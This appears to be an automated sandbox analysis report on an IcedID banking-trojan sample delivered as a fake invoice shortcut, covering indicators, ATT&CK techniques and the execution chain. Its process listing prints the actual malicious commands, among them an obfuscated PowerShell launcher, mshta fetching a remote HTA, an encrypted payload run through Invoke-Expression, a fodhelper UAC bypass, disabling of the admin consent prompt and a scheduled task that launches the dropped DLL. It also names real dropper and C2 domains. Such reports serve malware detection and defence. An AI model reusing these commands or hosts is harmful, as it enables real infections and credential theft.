icedid | 9646b87a32e3a271b4e36a73a8b9d1742035a0edbcdb11b00f85e3e13178a597

General

Target

Invoice_1.lnk
Size

2KB
MD5

c00c67f3de031c5ae198ba0362b5dd01
SHA1

40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
SHA256

d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
SHA512

4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad

Score

10^/10

icedid 109932505 banker evasion loader suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://conderadio.tv/09872574.hta

Extracted

Family

icedid

Campaign

109932505

C2

ilekvoyn.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 4 IoCs

Processes:

mshta.exepowershell.exeRundll32.exe

flow pid process

7 984 mshta.exe
11 984 mshta.exe
19 4620 powershell.exe
31 2040 Rundll32.exe
Downloads MZ/PE file

flow	pid	process
7	984	mshta.exe
11	984	mshta.exe
19	4620	powershell.exe
31	2040	Rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

Processes:

Rundll32.exe

pid process

2040 Rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2040	Rundll32.exe

Modifies registry class 11 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat"	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\ms-settings	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeRundll32.exe

pid	process
1768	powershell.exe
1768	powershell.exe
4620	powershell.exe
4620	powershell.exe
2412	powershell.exe
2412	powershell.exe
796	powershell.exe
796	powershell.exe
2040	Rundll32.exe
2040	Rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeIncreaseQuotaPrivilege	796	powershell.exe
Token: SeSecurityPrivilege	796	powershell.exe
Token: SeTakeOwnershipPrivilege	796	powershell.exe
Token: SeLoadDriverPrivilege	796	powershell.exe
Token: SeSystemProfilePrivilege	796	powershell.exe
Token: SeSystemtimePrivilege	796	powershell.exe
Token: SeProfSingleProcessPrivilege	796	powershell.exe
Token: SeIncBasePriorityPrivilege	796	powershell.exe
Token: SeCreatePagefilePrivilege	796	powershell.exe
Token: SeBackupPrivilege	796	powershell.exe
Token: SeRestorePrivilege	796	powershell.exe
Token: SeShutdownPrivilege	796	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeSystemEnvironmentPrivilege	796	powershell.exe
Token: SeRemoteShutdownPrivilege	796	powershell.exe
Token: SeUndockPrivilege	796	powershell.exe
Token: SeManageVolumePrivilege	796	powershell.exe
Token: 33	796	powershell.exe
Token: 34	796	powershell.exe
Token: 35	796	powershell.exe
Token: 36	796	powershell.exe
Token: SeIncreaseQuotaPrivilege	796	powershell.exe
Token: SeSecurityPrivilege	796	powershell.exe
Token: SeTakeOwnershipPrivilege	796	powershell.exe
Token: SeLoadDriverPrivilege	796	powershell.exe
Token: SeSystemProfilePrivilege	796	powershell.exe
Token: SeSystemtimePrivilege	796	powershell.exe
Token: SeProfSingleProcessPrivilege	796	powershell.exe
Token: SeIncBasePriorityPrivilege	796	powershell.exe
Token: SeCreatePagefilePrivilege	796	powershell.exe
Token: SeBackupPrivilege	796	powershell.exe
Token: SeRestorePrivilege	796	powershell.exe
Token: SeShutdownPrivilege	796	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeSystemEnvironmentPrivilege	796	powershell.exe
Token: SeRemoteShutdownPrivilege	796	powershell.exe
Token: SeUndockPrivilege	796	powershell.exe
Token: SeManageVolumePrivilege	796	powershell.exe
Token: 33	796	powershell.exe
Token: 34	796	powershell.exe
Token: 35	796	powershell.exe
Token: 36	796	powershell.exe
Token: SeIncreaseQuotaPrivilege	796	powershell.exe
Token: SeSecurityPrivilege	796	powershell.exe
Token: SeTakeOwnershipPrivilege	796	powershell.exe
Token: SeLoadDriverPrivilege	796	powershell.exe
Token: SeSystemProfilePrivilege	796	powershell.exe
Token: SeSystemtimePrivilege	796	powershell.exe
Token: SeProfSingleProcessPrivilege	796	powershell.exe
Token: SeIncBasePriorityPrivilege	796	powershell.exe
Token: SeCreatePagefilePrivilege	796	powershell.exe
Token: SeBackupPrivilege	796	powershell.exe
Token: SeRestorePrivilege	796	powershell.exe
Token: SeShutdownPrivilege	796	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeSystemEnvironmentPrivilege	796	powershell.exe
Token: SeRemoteShutdownPrivilege	796	powershell.exe
Token: SeUndockPrivilege	796	powershell.exe
Token: SeManageVolumePrivilege	796	powershell.exe
Token: 33	796	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Rundll32.exe

pid process

2040 Rundll32.exe

pid	process
2040	Rundll32.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exefodhelper.execmd.execmd.exefodhelper.execmd.execmd.exe

description	pid	process	target process
PID 3416 wrote to memory of 1768	3416	cmd.exe	powershell.exe
PID 3416 wrote to memory of 1768	3416	cmd.exe	powershell.exe
PID 1768 wrote to memory of 984	1768	powershell.exe	mshta.exe
PID 1768 wrote to memory of 984	1768	powershell.exe	mshta.exe
PID 984 wrote to memory of 4620	984	mshta.exe	powershell.exe
PID 984 wrote to memory of 4620	984	mshta.exe	powershell.exe
PID 4620 wrote to memory of 1452	4620	powershell.exe	fodhelper.exe
PID 4620 wrote to memory of 1452	4620	powershell.exe	fodhelper.exe
PID 1452 wrote to memory of 1200	1452	fodhelper.exe	cmd.exe
PID 1452 wrote to memory of 1200	1452	fodhelper.exe	cmd.exe
PID 1200 wrote to memory of 4808	1200	cmd.exe	cmd.exe
PID 1200 wrote to memory of 4808	1200	cmd.exe	cmd.exe
PID 4808 wrote to memory of 2412	4808	cmd.exe	powershell.exe
PID 4808 wrote to memory of 2412	4808	cmd.exe	powershell.exe
PID 4808 wrote to memory of 748	4808	cmd.exe	cmd.exe
PID 4808 wrote to memory of 748	4808	cmd.exe	cmd.exe
PID 4620 wrote to memory of 2120	4620	powershell.exe	fodhelper.exe
PID 4620 wrote to memory of 2120	4620	powershell.exe	fodhelper.exe
PID 2120 wrote to memory of 620	2120	fodhelper.exe	cmd.exe
PID 2120 wrote to memory of 620	2120	fodhelper.exe	cmd.exe
PID 620 wrote to memory of 1980	620	cmd.exe	cmd.exe
PID 620 wrote to memory of 1980	620	cmd.exe	cmd.exe
PID 1980 wrote to memory of 796	1980	cmd.exe	powershell.exe
PID 1980 wrote to memory of 796	1980	cmd.exe	powershell.exe
PID 1980 wrote to memory of 3764	1980	cmd.exe	cmd.exe
PID 1980 wrote to memory of 3764	1980	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = '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';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"
1⤵
PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *
1⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *
1⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"
2⤵
PID:3764

C:\Windows\system32\Rundll32.exe
Rundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1508

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
02a1a26525c65a359d41483180eaa6f7

SHA1
c0e2578b92d20e925c1c87016d1a9fccee1ec56f

SHA256
d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e

SHA512
d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e3b90537044a639dc6154f7eba9c8404

SHA1
dec8d4d8f0a9a8866babb6f17dd68d8a54e7f47a

SHA256
e0df7204949b2bf43825bfed4b611728bcf2683aabb280d4b4342a75cab34662

SHA512
3ad09f527b0475c847881c916e4f3854e3846e86b699f9194318ccda9b75af18cb7b02e6127f98ea17872cc6fe6f6731e73cbd39177bf56a3561450aebf463d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6d5c456bec9f9518de9a165a74f5a2d5

SHA1
8dd82931ccc7f095ba853abc766dd0a9d90aad07

SHA256
7f9d17b08e5415576814f195131e6cf495b77d256beccbe44a0292e7bd884b85

SHA512
5d6a6358cf29cc8b55b6aef12f2c61ba0dcff508e132cc77d47a736f5dac633ff4738b249f0726426a163c1cc0448e6b3cb54ace96351d355a17d27a42614475

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.dll

Filesize
718KB

MD5
5a0e570b13623c79c9261a8a2cc41f04

SHA1
10f6f208907d25f5ec39060a8576ed8387d42c0e

SHA256
3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109

SHA512
bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.dll

Filesize
718KB

MD5
5a0e570b13623c79c9261a8a2cc41f04

SHA1
10f6f208907d25f5ec39060a8576ed8387d42c0e

SHA256
3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109

SHA512
bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat

Filesize
343B

MD5
8ca0985471c9c17826fab97b90f90c2e

SHA1
6dfd1040096a2215be242e4392d7a2768d067f10

SHA256
f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781

SHA512
539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb

Download Submit
C:\Users\Admin\AppData\Local\Temp\kywdT.bat

Filesize
692B

MD5
a9338ee7f2e9643871e016eda0ecbe1f

SHA1
66c6dc3bcd948645774778263e7c8069e340e704

SHA256
c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813

SHA512
7cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f

Download Submit
memory/620-147-0x0000000000000000-mapping.dmp

Download
memory/748-145-0x0000000000000000-mapping.dmp

Download
memory/796-150-0x0000000000000000-mapping.dmp

Download
memory/796-152-0x00007FF8A1950000-0x00007FF8A2411000-memory.dmp

Filesize
10.8MB

Download
memory/984-132-0x0000000000000000-mapping.dmp

Download
memory/1200-140-0x0000000000000000-mapping.dmp

Download
memory/1452-139-0x0000000000000000-mapping.dmp

Download
memory/1768-131-0x000002173C650000-0x000002173C672000-memory.dmp

Filesize
136KB

Download
memory/1768-130-0x0000000000000000-mapping.dmp

Download
memory/1768-134-0x00007FF8A2C40000-0x00007FF8A3701000-memory.dmp

Filesize
10.8MB

Download
memory/1980-149-0x0000000000000000-mapping.dmp

Download
memory/2040-157-0x0000000180000000-0x0000000180009000-memory.dmp

Filesize
36KB

Download
memory/2120-146-0x0000000000000000-mapping.dmp

Download
memory/2412-144-0x00007FF8A1950000-0x00007FF8A2411000-memory.dmp

Filesize
10.8MB

Download
memory/2412-143-0x0000000000000000-mapping.dmp

Download
memory/3764-154-0x0000000000000000-mapping.dmp

Download
memory/4620-135-0x0000000000000000-mapping.dmp

Download
memory/4620-138-0x00007FF8A1950000-0x00007FF8A2411000-memory.dmp

Filesize
10.8MB

Download
memory/4808-142-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads